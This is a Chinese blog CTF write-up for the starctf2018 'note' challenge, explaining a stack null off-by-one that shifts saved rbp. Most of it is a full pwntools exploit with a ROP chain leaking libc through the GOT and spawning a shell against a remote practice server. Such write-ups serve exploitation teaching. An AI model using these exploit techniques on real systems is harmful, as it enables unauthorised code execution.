starctf2018_note(栈上的null off by one)

最新推荐文章于 2023-11-29 16:32:08 发布
最新推荐文章于 2023-11-29 16:32:08 发布
阅读量590 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107576753
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

starctf2018_note(栈上的null off by one)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在add函数里的scanf(“%256s”,&s)存在null off by one,其结果是将在栈里的rbp值低1字节覆盖为0。

将栈里rbp的值低1字节覆盖为0后,其结果导致main函数的rbp上移,这样,我们就可以在add里的可控缓冲区里控制main函数里scanf的格式化字符串指针,我们将其修改为%236s的地址,这样就能在main函数里进行栈溢出,做ROP。

#coding:utf8
from pwn import *

#sh = process('./note',env={'LD_PRELOAD':'./libc-2.23.so'})
sh = remote('node3.buuoj.cn',28076)
libc = ELF('./libc-2.23.so')
pop_rdi = 0x0000000000401003
pop_rsi = 0x0000000000401001
#pop rbp ; pop r14 ; pop r15 ; ret
pop_rbp = 0x0000000000400fff
pop_rsp = 0x0000000000400ffd
bss = 0x0000000000602800
puts_got = 0x0000000000601F90
scanf_got = 0x0000000000601FF0
format_str = 0x0000000000401129
jmp_ptr_rbp = 0x00000000004012B3

def add(content):
   sh.sendlineafter('>','1')
   sh.sendlineafter('Note:',content)

sh.sendlineafter('Input your ID:','haivk')

#通过null off by one修改了rbp,这样在main里的scanf的格式化控制字符串就能转移到我们能够控制的地方,我们将%d改为了%256s,
#这样在main里的scanf就可以溢出了
payload = 'a'*0xA8 + p64(format_str)
payload = payload.ljust(0x100,'a')
#null off by one
add(payload)

payload = 'a'*0x64
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(pop_rbp)
payload += p64(puts_got)
payload += p64(0)*2
payload += p64(jmp_ptr_rbp)

payload += p64(pop_rdi)
payload += p64(format_str)
payload += p64(pop_rsi)
payload += p64(bss)
payload += p64(0)
payload += p64(pop_rbp)
payload += p64(scanf_got)
payload += p64(0)*2
payload += p64(jmp_ptr_rbp)

payload += p64(pop_rsp)
payload += p64(bss)

sh.sendlineafter('>',payload)
sh.recv(1)
puts_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)

sleep(0.2)
payload = 'a'*0x18 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
sh.sendline(payload)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF之off by one漏洞
weixin_45441024的博客
05-21 485
BUUCTF npuctf_2020_easyheap 首先分析一下这个程序,PIE关闭,说明可以修改got表 大概看一下程序的执行机制 堆题常见菜单结构 def add(size,content): p.sendlineafter('Your choice :',str(1)) p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size)) p.sendlineafter('Content:',content) def edit(
【Visual C++】Code_Note_2
03-26
博文的配套源码 《【 Visual C++】游戏开发笔记之二——最简单的directx,vc窗口的编写 》 ,原文地址为... 源码编译环境为vs2010. ... 希望能和大家一起交流,共同学习,共同进步。
Unlink学习笔记(off-by-one null byte漏洞利用)
TaiJi1985的专栏
08-27 2700
看了很多malloc unlink 的案例,仍然是云里雾里, 找了一个案例,反复调了几十遍才弄明白其中原理。 off-by-one 漏洞 以及漏洞利用原理 off-by-one漏洞就是malloc 本来分配了0xf8的内存,结果可以写0xf9字节的数据,多写了一个,影响了下一个内存块的头部信息, 进而造成了被利用的可能。 unlink是双链表中删除一个节点的操作。 当前是p 前一个...
BUUCTF:【x_nuca_2018_offbyone2】(off by null
weixin_51055545的博客
01-06 1312
在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些 例行检查:
off by null 小结
qq_43409582的博客
11-20 3374
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
Linux (x86) Exploit 开发系列教程之三(Off-By-One 漏洞 (基于栈))
weixin_33894640的博客
05-14 154
(1)原理: 将源字符串复制到目标缓冲区可能会导致off by one。当源字符串长度等于目标缓冲区长度时,单个NULL字节将被复制到目标缓冲区上方。这里由于目标缓冲区位于堆栈中,所以单个NULL字节可以覆盖存储在堆栈中的调用者的EBP的最低有效位(LSB),这可能导致任意的代码执行。 (2)漏洞代码 #include <stdio.h> #include <stri...
【Visual C++】Code_Note_13
03-29
博文的配套源码 《【Visual C++】游戏开发笔记十三 游戏输入消息处理(二) 鼠标消息处理》 ,原文地址为... 源码编译环境为vs2010. ... 希望能和大家一起交流,共同学习,共同进步。
【Visual C 】Code_Note_12
03-27
博文的配套源码 《 【Visual C++】游戏开发笔记十二 游戏输入消息处理(一) 键盘 消息处理》 ,原文地址为... 源码编译环境为vs2010. ... 希望能和大家一起交流,共同学习,共同进步。
【Visual C++】Code_Note_7
03-27
博文的配套源码 《【Visual C++】游戏开发笔记之七——基础动画显示(一)定时器的使用》 ,原文地址为... 源码编译环境为vs2010. ... 希望能和大家一起交流,共同学习,共同进步。
【Visual C++】Code_Note_14
04-03
博文的配套源码 《【Visual C++】游戏开发笔记之十四 游戏画面绘图(四) 华丽的CImage类 》 ,原文地址为... 源码编译环境为vs2010. ... 希望能和大家一起交流,共同学习,共同进步。
好好说话之off-by-one
hollk’s blog
08-24 5639
从这篇开始就进入堆的范围了,又是两万字”小论文“,关于堆的相关知识请参考wiki上的章节。博主直接讲做堆的技巧,这篇讲off-by-one,也是踩了很多的坑。这篇文章因为写的比较详细,所以会很长,如果有忘记的知识点请翻阅目录查看。感谢在学习中帮助过我的大佬们:NoOne、povcfe
introduction to software exploits off-by-one 一字节溢出
lixiangminghate的专栏
03-15 912
原文链接:introduction to software exploits  off-by-one     公开课Introduction to Software Exploits涵盖了简短的基于C语言的off-by-one漏洞,但由于时间关系,讲师并没有介绍如何利用漏洞。为此,我邀请你跟着我一起向编写优美的漏洞利用程序发出挑战。 挑战:     你可以在课程附带的虚拟机实验目录下找到下列
从wiki 重新打基础之off by one(未完待续。。。)
qq_41071646的博客
07-19 198
突然发现 off by one 这个例题太难了,, 有点难顶,, 实例 1: Asis CTF 2016 b00ks 这个题目,,, 看起来很好分析 保护的话 ,, 基本上 堆该有的保护 他全都有了,, 调试一波 增加一下 程序理解 bss 段 1 就是我们 book的地址 2是name的地址 3 4 就是 1 2 所对应的值 然后我们看一下book ...
linux怎汇编leave,Linux (x86) Exploit 开发系列教程之三(Off-By-One 漏洞 (基于栈))
weixin_29666725的博客
05-16 228
(1)原理:将源字符串复制到目标缓冲区可能会导致off by one。当源字符串长度等于目标缓冲区长度时,单个NULL字节将被复制到目标缓冲区上方。这里由于目标缓冲区位于堆栈中,所以单个NULL字节可以覆盖存储在堆栈中的调用者的EBP的最低有效位(LSB),这可能导致任意的代码执行。(2)漏洞代码#include #include void foo(char* arg);void bar(char...
(BUUCTF)starctf2018_babystack
最新发布
xy1458214551的博客
11-29 181
BUUCTF上的starctf2018_babystack题解
关于scanf函数与printf函数应该注意的点
suliangkuanjiayou的博客
12-08 1743
这个是有关scanf与printf深入理解,以及常常会犯的错误整理。
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 920
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
ncnn之四:参数和模型文件结构
mingo_敏
12-14 3227
net.param 7767517 # magic number 158 183 # [layer count] [blob count] # [layer type] [layer name] [input count] [output count] [input blobs] [output blobs] [layer specific params] Input dat...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值